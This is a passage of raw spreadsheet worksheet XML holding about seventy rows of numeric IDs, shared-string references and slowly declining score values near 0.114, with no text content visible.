      </c>
      <c r="C9237" s="2" t="s">
        <v>8815</v>
      </c>
      <c r="D9237" s="2">
        <v>1.0</v>
      </c>
      <c r="E9237" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9237" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9238" ht="15.75" customHeight="1">
      <c r="A9238" s="1">
        <v>28069.0</v>
      </c>
      <c r="B9238" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C9238" s="2" t="s">
        <v>8816</v>
      </c>
      <c r="D9238" s="2">
        <v>1.0</v>
      </c>
      <c r="E9238" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9238" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9239" ht="15.75" customHeight="1">
      <c r="A9239" s="1">
        <v>28087.0</v>
      </c>
      <c r="B9239" s="2">
        <v>2.4640847E7</v>
      </c>
      <c r="C9239" s="2" t="s">
        <v>8813</v>
      </c>
      <c r="D9239" s="2">
        <v>1.0</v>
      </c>
      <c r="E9239" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9239" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9240" ht="15.75" customHeight="1">
      <c r="A9240" s="1">
        <v>28430.0</v>
      </c>
      <c r="B9240" s="2">
        <v>2.644518E7</v>
      </c>
      <c r="C9240" s="2" t="s">
        <v>8817</v>
      </c>
      <c r="D9240" s="2">
        <v>1.0</v>
      </c>
      <c r="E9240" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9240" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9241" ht="15.75" customHeight="1">
      <c r="A9241" s="1">
        <v>29323.0</v>
      </c>
      <c r="B9241" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C9241" s="2" t="s">
        <v>8818</v>
      </c>
      <c r="D9241" s="2">
        <v>1.0</v>
      </c>
      <c r="E9241" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9241" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9242" ht="15.75" customHeight="1">
      <c r="A9242" s="1">
        <v>29495.0</v>
      </c>
      <c r="B9242" s="2">
        <v>3.2629506E7</v>
      </c>
      <c r="C9242" s="2" t="s">
        <v>8819</v>
      </c>
      <c r="D9242" s="2">
        <v>1.0</v>
      </c>
      <c r="E9242" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9242" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9243" ht="15.75" customHeight="1">
      <c r="A9243" s="1">
        <v>30950.0</v>
      </c>
      <c r="B9243" s="2">
        <v>4.7336868E7</v>
      </c>
      <c r="C9243" s="2" t="s">
        <v>8820</v>
      </c>
      <c r="D9243" s="2">
        <v>1.0</v>
      </c>
      <c r="E9243" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9243" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9244" ht="15.75" customHeight="1">
      <c r="A9244" s="1">
        <v>31499.0</v>
      </c>
      <c r="B9244" s="2">
        <v>5.0682317E7</v>
      </c>
      <c r="C9244" s="2" t="s">
        <v>8821</v>
      </c>
      <c r="D9244" s="2">
        <v>1.0</v>
      </c>
      <c r="E9244" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9244" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9245" ht="15.75" customHeight="1">
      <c r="A9245" s="1">
        <v>31861.0</v>
      </c>
      <c r="B9245" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C9245" s="2" t="s">
        <v>8822</v>
      </c>
      <c r="D9245" s="2">
        <v>1.0</v>
      </c>
      <c r="E9245" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9245" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9246" ht="15.75" customHeight="1">
      <c r="A9246" s="1">
        <v>32324.0</v>
      </c>
      <c r="B9246" s="2">
        <v>5.5767663E7</v>
      </c>
      <c r="C9246" s="2" t="s">
        <v>8823</v>
      </c>
      <c r="D9246" s="2">
        <v>1.0</v>
      </c>
      <c r="E9246" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9246" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9247" ht="15.75" customHeight="1">
      <c r="A9247" s="1">
        <v>32547.0</v>
      </c>
      <c r="B9247" s="2">
        <v>5751102.0</v>
      </c>
      <c r="C9247" s="2" t="s">
        <v>8824</v>
      </c>
      <c r="D9247" s="2">
        <v>1.0</v>
      </c>
      <c r="E9247" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9247" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9248" ht="15.75" customHeight="1">
      <c r="A9248" s="1">
        <v>32789.0</v>
      </c>
      <c r="B9248" s="2">
        <v>6138398.0</v>
      </c>
      <c r="C9248" s="2" t="s">
        <v>8824</v>
      </c>
      <c r="D9248" s="2">
        <v>1.0</v>
      </c>
      <c r="E9248" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9248" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9249" ht="15.75" customHeight="1">
      <c r="A9249" s="1">
        <v>33158.0</v>
      </c>
      <c r="B9249" s="2">
        <v>7085831.0</v>
      </c>
      <c r="C9249" s="2" t="s">
        <v>8825</v>
      </c>
      <c r="D9249" s="2">
        <v>1.0</v>
      </c>
      <c r="E9249" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9249" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9250" ht="15.75" customHeight="1">
      <c r="A9250" s="1">
        <v>33290.0</v>
      </c>
      <c r="B9250" s="2">
        <v>7457539.0</v>
      </c>
      <c r="C9250" s="2" t="s">
        <v>8826</v>
      </c>
      <c r="D9250" s="2">
        <v>1.0</v>
      </c>
      <c r="E9250" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9250" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9251" ht="15.75" customHeight="1">
      <c r="A9251" s="1">
        <v>33878.0</v>
      </c>
      <c r="B9251" s="2">
        <v>9110522.0</v>
      </c>
      <c r="C9251" s="2" t="s">
        <v>8827</v>
      </c>
      <c r="D9251" s="2">
        <v>1.0</v>
      </c>
      <c r="E9251" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9251" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="9252" ht="15.75" customHeight="1">
      <c r="A9252" s="1">
        <v>26240.0</v>
      </c>
      <c r="B9252" s="2">
        <v>1.6288174E7</v>
      </c>
      <c r="C9252" s="2" t="s">
        <v>8828</v>
      </c>
      <c r="D9252" s="2">
        <v>1.0</v>
      </c>
      <c r="E9252" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9252" s="2">
        <v>0.1141414141414142</v>
      </c>
    </row>
    <row r="9253" ht="15.75" customHeight="1">
      <c r="A9253" s="1">
        <v>224.0</v>
      </c>
      <c r="B9253" s="2">
        <v>1.4667916E7</v>
      </c>
      <c r="C9253" s="2" t="s">
        <v>8829</v>
      </c>
      <c r="D9253" s="2">
        <v>1.0</v>
      </c>
      <c r="E9253" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9253" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9254" ht="15.75" customHeight="1">
      <c r="A9254" s="1">
        <v>4381.0</v>
      </c>
      <c r="B9254" s="2">
        <v>4.2167634E7</v>
      </c>
      <c r="C9254" s="2" t="s">
        <v>8830</v>
      </c>
      <c r="D9254" s="2">
        <v>1.0</v>
      </c>
      <c r="E9254" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9254" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9255" ht="15.75" customHeight="1">
      <c r="A9255" s="1">
        <v>6060.0</v>
      </c>
      <c r="B9255" s="2">
        <v>4.7613459E7</v>
      </c>
      <c r="C9255" s="2" t="s">
        <v>8831</v>
      </c>
      <c r="D9255" s="2">
        <v>1.0</v>
      </c>
      <c r="E9255" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9255" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9256" ht="15.75" customHeight="1">
      <c r="A9256" s="1">
        <v>6210.0</v>
      </c>
      <c r="B9256" s="2">
        <v>4.798624E7</v>
      </c>
      <c r="C9256" s="2" t="s">
        <v>8832</v>
      </c>
      <c r="D9256" s="2">
        <v>1.0</v>
      </c>
      <c r="E9256" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9256" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9257" ht="15.75" customHeight="1">
      <c r="A9257" s="1">
        <v>11548.0</v>
      </c>
      <c r="B9257" s="2">
        <v>2.2676725E7</v>
      </c>
      <c r="C9257" s="2" t="s">
        <v>8833</v>
      </c>
      <c r="D9257" s="2">
        <v>1.0</v>
      </c>
      <c r="E9257" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9257" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9258" ht="15.75" customHeight="1">
      <c r="A9258" s="1">
        <v>11622.0</v>
      </c>
      <c r="B9258" s="2">
        <v>2.3096233E7</v>
      </c>
      <c r="C9258" s="2" t="s">
        <v>8834</v>
      </c>
      <c r="D9258" s="2">
        <v>1.0</v>
      </c>
      <c r="E9258" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9258" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9259" ht="15.75" customHeight="1">
      <c r="A9259" s="1">
        <v>13460.0</v>
      </c>
      <c r="B9259" s="2">
        <v>3.5200076E7</v>
      </c>
      <c r="C9259" s="2" t="s">
        <v>8835</v>
      </c>
      <c r="D9259" s="2">
        <v>1.0</v>
      </c>
      <c r="E9259" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9259" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9260" ht="15.75" customHeight="1">
      <c r="A9260" s="1">
        <v>13561.0</v>
      </c>
      <c r="B9260" s="2">
        <v>3.5666495E7</v>
      </c>
      <c r="C9260" s="2" t="s">
        <v>8836</v>
      </c>
      <c r="D9260" s="2">
        <v>1.0</v>
      </c>
      <c r="E9260" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9260" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9261" ht="15.75" customHeight="1">
      <c r="A9261" s="1">
        <v>14114.0</v>
      </c>
      <c r="B9261" s="2">
        <v>3.778507E7</v>
      </c>
      <c r="C9261" s="2" t="s">
        <v>8837</v>
      </c>
      <c r="D9261" s="2">
        <v>1.0</v>
      </c>
      <c r="E9261" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9261" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9262" ht="15.75" customHeight="1">
      <c r="A9262" s="1">
        <v>15058.0</v>
      </c>
      <c r="B9262" s="2">
        <v>4.1692348E7</v>
      </c>
      <c r="C9262" s="2" t="s">
        <v>8838</v>
      </c>
      <c r="D9262" s="2">
        <v>1.0</v>
      </c>
      <c r="E9262" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9262" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9263" ht="15.75" customHeight="1">
      <c r="A9263" s="1">
        <v>29664.0</v>
      </c>
      <c r="B9263" s="2">
        <v>3.3944897E7</v>
      </c>
      <c r="C9263" s="2" t="s">
        <v>8839</v>
      </c>
      <c r="D9263" s="2">
        <v>1.0</v>
      </c>
      <c r="E9263" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9263" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9264" ht="15.75" customHeight="1">
      <c r="A9264" s="1">
        <v>29936.0</v>
      </c>
      <c r="B9264" s="2">
        <v>3.6073335E7</v>
      </c>
      <c r="C9264" s="2" t="s">
        <v>8840</v>
      </c>
      <c r="D9264" s="2">
        <v>1.0</v>
      </c>
      <c r="E9264" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9264" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="9265" ht="15.75" customHeight="1">
      <c r="A9265" s="1">
        <v>751.0</v>
      </c>
      <c r="B9265" s="2">
        <v>2.0934843E7</v>
      </c>
      <c r="C9265" s="2" t="s">
        <v>8841</v>
      </c>
      <c r="D9265" s="2">
        <v>1.0</v>
      </c>
      <c r="E9265" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9265" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9266" ht="15.75" customHeight="1">
      <c r="A9266" s="1">
        <v>2137.0</v>
      </c>
      <c r="B9266" s="2">
        <v>3.1562289E7</v>
      </c>
      <c r="C9266" s="2" t="s">
        <v>8842</v>
      </c>
      <c r="D9266" s="2">
        <v>1.0</v>
      </c>
      <c r="E9266" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9266" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9267" ht="15.75" customHeight="1">
      <c r="A9267" s="1">
        <v>8585.0</v>
      </c>
      <c r="B9267" s="2">
        <v>5.4230088E7</v>
      </c>
      <c r="C9267" s="2" t="s">
        <v>8843</v>
      </c>
      <c r="D9267" s="2">
        <v>1.0</v>
      </c>
      <c r="E9267" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9267" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9268" ht="15.75" customHeight="1">
      <c r="A9268" s="1">
        <v>8730.0</v>
      </c>
      <c r="B9268" s="2">
        <v>5.4520932E7</v>
      </c>
      <c r="C9268" s="2" t="s">
        <v>8844</v>
      </c>
      <c r="D9268" s="2">
        <v>1.0</v>
      </c>
      <c r="E9268" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9268" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9269" ht="15.75" customHeight="1">
      <c r="A9269" s="1">
        <v>12809.0</v>
      </c>
      <c r="B9269" s="2">
        <v>3.1572498E7</v>
      </c>
      <c r="C9269" s="2" t="s">
        <v>8842</v>
      </c>
      <c r="D9269" s="2">
        <v>1.0</v>
      </c>
      <c r="E9269" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9269" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9270" ht="15.75" customHeight="1">
      <c r="A9270" s="1">
        <v>14210.0</v>
      </c>
      <c r="B9270" s="2">
        <v>3.8256484E7</v>
      </c>
      <c r="C9270" s="2" t="s">
        <v>8845</v>
      </c>
      <c r="D9270" s="2">
        <v>1.0</v>
      </c>
      <c r="E9270" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9270" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9271" ht="15.75" customHeight="1">
      <c r="A9271" s="1">
        <v>17103.0</v>
      </c>
      <c r="B9271" s="2">
        <v>4.8685371E7</v>
      </c>
      <c r="C9271" s="2" t="s">
        <v>8846</v>
      </c>
      <c r="D9271" s="2">
        <v>1.0</v>
      </c>
      <c r="E9271" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9271" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9272" ht="15.75" customHeight="1">
      <c r="A9272" s="1">
        <v>17549.0</v>
      </c>
      <c r="B9272" s="2">
        <v>5.0202827E7</v>
      </c>
      <c r="C9272" s="2" t="s">
        <v>8847</v>
      </c>
      <c r="D9272" s="2">
        <v>1.0</v>
      </c>
      <c r="E9272" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9272" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9273" ht="15.75" customHeight="1">
      <c r="A9273" s="1">
        <v>17852.0</v>
      </c>
      <c r="B9273" s="2">
        <v>5.0984021E7</v>
      </c>
      <c r="C9273" s="2" t="s">
        <v>8848</v>
      </c>
      <c r="D9273" s="2">
        <v>1.0</v>
      </c>
      <c r="E9273" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9273" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9274" ht="15.75" customHeight="1">
      <c r="A9274" s="1">
        <v>19079.0</v>
      </c>
      <c r="B9274" s="2">
        <v>5.4642422E7</v>
      </c>
      <c r="C9274" s="2" t="s">
        <v>8849</v>
      </c>
      <c r="D9274" s="2">
        <v>1.0</v>
      </c>
      <c r="E9274" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9274" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9275" ht="15.75" customHeight="1">
      <c r="A9275" s="1">
        <v>21336.0</v>
      </c>
      <c r="B9275" s="2">
        <v>2.1084746E7</v>
      </c>
      <c r="C9275" s="2" t="s">
        <v>8463</v>
      </c>
      <c r="D9275" s="2">
        <v>1.0</v>
      </c>
      <c r="E9275" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9275" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9276" ht="15.75" customHeight="1">
      <c r="A9276" s="1">
        <v>26973.0</v>
      </c>
      <c r="B9276" s="2">
        <v>1.9660019E7</v>
      </c>
      <c r="C9276" s="2" t="s">
        <v>8850</v>
      </c>
      <c r="D9276" s="2">
        <v>1.0</v>
      </c>
      <c r="E9276" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9276" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9277" ht="15.75" customHeight="1">
      <c r="A9277" s="1">
        <v>31285.0</v>
      </c>
      <c r="B9277" s="2">
        <v>4.961702E7</v>
      </c>
      <c r="C9277" s="2" t="s">
        <v>8851</v>
      </c>
      <c r="D9277" s="2">
        <v>1.0</v>
      </c>
      <c r="E9277" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9277" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9278" ht="15.75" customHeight="1">
      <c r="A9278" s="1">
        <v>33002.0</v>
      </c>
      <c r="B9278" s="2">
        <v>6620905.0</v>
      </c>
      <c r="C9278" s="2" t="s">
        <v>8852</v>
      </c>
      <c r="D9278" s="2">
        <v>1.0</v>
      </c>
      <c r="E9278" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9278" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="9279" ht="15.75" customHeight="1">
      <c r="A9279" s="1">
        <v>5050.0</v>
      </c>
      <c r="B9279" s="2">
        <v>4.4330722E7</v>
      </c>
      <c r="C9279" s="2" t="s">
        <v>8853</v>
      </c>
      <c r="D9279" s="2">
        <v>1.0</v>
      </c>
      <c r="E9279" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9279" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9280" ht="15.75" customHeight="1">
      <c r="A9280" s="1">
        <v>7141.0</v>
      </c>
      <c r="B9280" s="2">
        <v>5.0443456E7</v>
      </c>
      <c r="C9280" s="2" t="s">
        <v>8854</v>
      </c>
      <c r="D9280" s="2">
        <v>1.0</v>
      </c>
      <c r="E9280" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9280" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9281" ht="15.75" customHeight="1">
      <c r="A9281" s="1">
        <v>7415.0</v>
      </c>
      <c r="B9281" s="2">
        <v>5.1139284E7</v>
      </c>
      <c r="C9281" s="2" t="s">
        <v>8855</v>
      </c>
      <c r="D9281" s="2">
        <v>1.0</v>
      </c>
      <c r="E9281" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9281" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9282" ht="15.75" customHeight="1">
      <c r="A9282" s="1">
        <v>11321.0</v>
      </c>
      <c r="B9282" s="2">
        <v>2.1080342E7</v>
      </c>
      <c r="C9282" s="2" t="s">
        <v>8856</v>
      </c>
      <c r="D9282" s="2">
        <v>1.0</v>
      </c>
      <c r="E9282" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9282" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9283" ht="15.75" customHeight="1">
      <c r="A9283" s="1">
        <v>11600.0</v>
      </c>
      <c r="B9283" s="2">
        <v>2.2947801E7</v>
      </c>
      <c r="C9283" s="2" t="s">
        <v>8857</v>
      </c>
      <c r="D9283" s="2">
        <v>1.0</v>
      </c>
      <c r="E9283" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9283" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9284" ht="15.75" customHeight="1">
      <c r="A9284" s="1">
        <v>18200.0</v>
      </c>
      <c r="B9284" s="2">
        <v>5.2036616E7</v>
      </c>
      <c r="C9284" s="2" t="s">
        <v>8858</v>
      </c>
      <c r="D9284" s="2">
        <v>1.0</v>
      </c>
      <c r="E9284" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9284" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9285" ht="15.75" customHeight="1">
      <c r="A9285" s="1">
        <v>19931.0</v>
      </c>
      <c r="B9285" s="2">
        <v>5.7434773E7</v>
      </c>
      <c r="C9285" s="2" t="s">
        <v>8859</v>
      </c>
      <c r="D9285" s="2">
        <v>1.0</v>
      </c>
      <c r="E9285" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9285" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9286" ht="15.75" customHeight="1">
      <c r="A9286" s="1">
        <v>23278.0</v>
      </c>
      <c r="B9286" s="2">
        <v>5364060.0</v>
      </c>
      <c r="C9286" s="2" t="s">
        <v>8860</v>
      </c>
      <c r="D9286" s="2">
        <v>1.0</v>
      </c>
      <c r="E9286" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9286" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9287" ht="15.75" customHeight="1">
      <c r="A9287" s="1">
        <v>33000.0</v>
      </c>
      <c r="B9287" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C9287" s="2" t="s">
        <v>8861</v>
      </c>
      <c r="D9287" s="2">
        <v>1.0</v>
      </c>
      <c r="E9287" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9287" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="9288" ht="15.75" customHeight="1">
      <c r="A9288" s="1">
        <v>2273.0</v>
      </c>
      <c r="B9288" s="2">
        <v>3.2527615E7</v>
      </c>
      <c r="C9288" s="2" t="s">
        <v>8862</v>
      </c>
      <c r="D9288" s="2">
        <v>1.0</v>
      </c>
      <c r="E9288" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9288" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="9289" ht="15.75" customHeight="1">
      <c r="A9289" s="1">
        <v>22488.0</v>
      </c>
      <c r="B9289" s="2">
        <v>3.7054193E7</v>
      </c>
      <c r="C9289" s="2" t="s">
        <v>8475</v>
      </c>
      <c r="D9289" s="2">
        <v>1.0</v>
      </c>
      <c r="E9289" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9289" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="9290" ht="15.75" customHeight="1">
      <c r="A9290" s="1">
        <v>2926.0</v>
      </c>
      <c r="B9290" s="2">
        <v>3.5874352E7</v>
      </c>
      <c r="C9290" s="2" t="s">
        <v>8863</v>
      </c>
      <c r="D9290" s="2">
        <v>1.0</v>
      </c>
      <c r="E9290" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9290" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9291" ht="15.75" customHeight="1">
      <c r="A9291" s="1">
        <v>3613.0</v>
      </c>
      <c r="B9291" s="2">
        <v>3.9147639E7</v>
      </c>
      <c r="C9291" s="2" t="s">
        <v>8864</v>
      </c>
      <c r="D9291" s="2">
        <v>1.0</v>
      </c>
      <c r="E9291" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9291" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9292" ht="15.75" customHeight="1">
      <c r="A9292" s="1">
        <v>5433.0</v>
      </c>
      <c r="B9292" s="2">
        <v>4.5576773E7</v>
      </c>
      <c r="C9292" s="2" t="s">
        <v>8865</v>
      </c>
      <c r="D9292" s="2">
        <v>1.0</v>
      </c>
      <c r="E9292" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9292" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9293" ht="15.75" customHeight="1">
      <c r="A9293" s="1">
        <v>12635.0</v>
      </c>
      <c r="B9293" s="2">
        <v>3.029759E7</v>
      </c>
      <c r="C9293" s="2" t="s">
        <v>8866</v>
      </c>
      <c r="D9293" s="2">
        <v>1.0</v>
      </c>
      <c r="E9293" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9293" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9294" ht="15.75" customHeight="1">
      <c r="A9294" s="1">
        <v>19532.0</v>
      </c>
      <c r="B9294" s="2">
        <v>5.5978465E7</v>
      </c>
      <c r="C9294" s="2" t="s">
        <v>8867</v>
      </c>
      <c r="D9294" s="2">
        <v>1.0</v>
      </c>
      <c r="E9294" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9294" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9295" ht="15.75" customHeight="1">
      <c r="A9295" s="1">
        <v>19584.0</v>
      </c>
      <c r="B9295" s="2">
        <v>5.6155241E7</v>
      </c>
      <c r="C9295" s="2" t="s">
        <v>8868</v>
      </c>
      <c r="D9295" s="2">
        <v>1.0</v>
      </c>
      <c r="E9295" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9295" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9296" ht="15.75" customHeight="1">
      <c r="A9296" s="1">
        <v>31010.0</v>
      </c>
      <c r="B9296" s="2">
        <v>4771280.0</v>
      </c>
      <c r="C9296" s="2" t="s">
        <v>8869</v>
      </c>
      <c r="D9296" s="2">
        <v>1.0</v>
      </c>
      <c r="E9296" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9296" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="9297" ht="15.75" customHeight="1">
      <c r="A9297" s="1">
        <v>13467.0</v>
      </c>
      <c r="B9297" s="2">
        <v>3.5232714E7</v>
      </c>
      <c r="C9297" s="2" t="s">
        <v>8870</v>
      </c>
      <c r="D9297" s="2">
        <v>1.0</v>
      </c>
      <c r="E9297" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9297" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="9298" ht="15.75" customHeight="1">
      <c r="A9298" s="1">
        <v>11307.0</v>
      </c>
      <c r="B9298" s="2">
        <v>2099891.0</v>
      </c>
      <c r="C9298" s="2" t="s">
        <v>8871</v>
      </c>
      <c r="D9298" s="2">
        <v>1.0</v>
      </c>
      <c r="E9298" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9298" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="9299" ht="15.75" customHeight="1">
      <c r="A9299" s="1">
        <v>15141.0</v>
      </c>
      <c r="B9299" s="2">
        <v>4.1927677E7</v>
      </c>
      <c r="C9299" s="2" t="s">
        <v>8872</v>
      </c>
      <c r="D9299" s="2">
        <v>1.0</v>
      </c>
      <c r="E9299" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9299" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="9300" ht="15.75" customHeight="1">
      <c r="A9300" s="1">
        <v>13562.0</v>
      </c>
      <c r="B9300" s="2">
        <v>3.5679229E7</v>
      </c>
      <c r="C9300" s="2" t="s">
        <v>8873</v>
      </c>
      <c r="D9300" s="2">
        <v>1.0</v>
      </c>
      <c r="E9300" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9300" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="9301" ht="15.75" customHeight="1">
      <c r="A9301" s="1">
        <v>26390.0</v>
      </c>
      <c r="B9301" s="2">
        <v>1.7000246E7</v>
      </c>
      <c r="C9301" s="2" t="s">
        <v>8874</v>
      </c>
      <c r="D9301" s="2">
        <v>1.0</v>
      </c>
      <c r="E9301" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9301" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="9302" ht="15.75" customHeight="1">
      <c r="A9302" s="1">
        <v>31682.0</v>
      </c>
      <c r="B9302" s="2">
        <v>5188459.0</v>
      </c>
      <c r="C9302" s="2" t="s">
        <v>8875</v>
      </c>
      <c r="D9302" s="2">
        <v>1.0</v>
      </c>
      <c r="E9302" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9302" s="2">
        <v>0.1138433515482695</v>
      </c>
    </row>
    <row r="9303" ht="15.75" customHeight="1">
      <c r="A9303" s="1">
        <v>26864.0</v>
      </c>
      <c r="B9303" s="2">
        <v>1.9040122E7</v>
      </c>
      <c r="C9303" s="2" t="s">
        <v>8876</v>
      </c>
      <c r="D9303" s="2">
        <v>1.0</v>
      </c>
      <c r="E9303" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9303" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="9304" ht="15.75" customHeight="1">
      <c r="A9304" s="1">
        <v>1494.0</v>
      </c>
      <c r="B9304" s="2">
        <v>2.7217548E7</v>
      </c>
      <c r="C9304" s="2" t="s">
